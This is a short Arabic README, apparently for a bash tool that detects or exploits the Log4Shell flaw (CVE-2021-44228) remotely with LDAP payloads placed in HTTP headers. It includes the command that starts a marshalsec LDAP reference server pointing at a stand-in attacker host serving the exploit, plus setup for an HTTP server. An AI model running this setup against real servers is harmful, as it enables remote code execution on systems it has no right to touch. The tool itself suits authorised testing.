
سكربت بلغة باش يمكن من تحديد ثغرة Log4j CVE-2021-44228 عن بعد.
سكربت bash يتيح تحديد و/أو استغلال ثغرة Log4shell عن بُعد. تقوم هذه الأداة بإجراء اختبارات مختلفة باستخدام حمولات LDAP ورؤوس X-Api-Version وUser-Agent وX-Forwarded-For.
mvn clean package -DskipTests && Java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar
marshalsec.jndi.LDAPRefServer 'http://attacker.com/#exploit'
نقوم بتفعيل خادم HTTP python3 -m http.server 8080
يجب تثبيت Java #sudo apt install default-jre
يجب تثبيت Curl #sudo apt-get install curl
أدخل المعاملات التالية:
#مثال فحص تطبيق على شبكة داخلية:

#مثال فحص تطبيق على الإنترنت:
